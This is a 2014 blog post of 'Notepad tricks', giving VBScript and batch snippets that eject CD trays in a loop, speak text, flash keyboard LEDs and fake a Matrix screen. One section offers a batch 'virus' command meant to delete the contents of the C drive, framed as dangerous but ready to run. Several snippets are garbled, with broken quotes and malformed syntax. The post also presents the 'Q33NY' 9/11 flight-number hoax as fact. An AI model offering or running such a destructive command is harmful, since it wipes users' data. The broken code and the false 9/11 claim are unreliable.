Google+ Followers

Monday, 23 June 2014

Best Ever Notepad Tips and Tricks

Best Ever Notepad Tips and Tricks
Everyone uses notepad daily on the computer, but how many of you know that notepad had also some mind blowing tricks that force you to rethink. Here today I am sharing  some cool tricks related to notepad.  In this post I will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other than notepad. So let's get started. But before starting truetricks.net wants to inform you that these tricks are dangerous so do it at your own risk, after any damage true tricks is not responsible for damage.




Continually Pop The CD Drive

Open Notepad.

Copy the code given below onto the notepad file:

Set oWMP = CreateObject(“WMPlayer.OCX.7?) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop
Save it as “Anything.VBS”.

Now open the file and see the magic! The file will continuously force the CD rom to pop out! And If you have more than one then it pops out all of them!

Note: Don’t worry when this crazy notepad trick opens your cd tray continuously. If you want to end this script simply Open Task Manager(Alt+Ctrl+Delete). Under Processes end the process wscript.exe”

Convert Text Into Audio Using Notepad


How To Do It ?

Open Notepad file on your Windows PC.

Copy and paste the below mentioned code :

Dim msg, sapi msg=InputBox(“Enter your text for conversion–www.techvorm.com”,”TechVorm Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak msg 

Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs.  That's it ! Your Text to Audio converter is ready to be used. Now open the saved file and key in the text you want to convert and click OK. If you find any difficulties in using this code, let me know via comments section.

World Trade Center Attack

The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definitely amazed by this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.

Matrix effect Trick

In this trick I will show you to make a batch file in notepad which will act as a matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.

@echo off color 02 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

Creating that can format C drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off Del C:\ *.* |y
  
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

Using notepad as personal diary

Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad.

Dancing Keyboard Lights

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.

Over to you

These are funny and interesting notepad tricks that will blow your mind, if you find this post interesting and useful then share it or comment below the post. For more tricks stay connected.



Share This Post →


No comments:

Post a Comment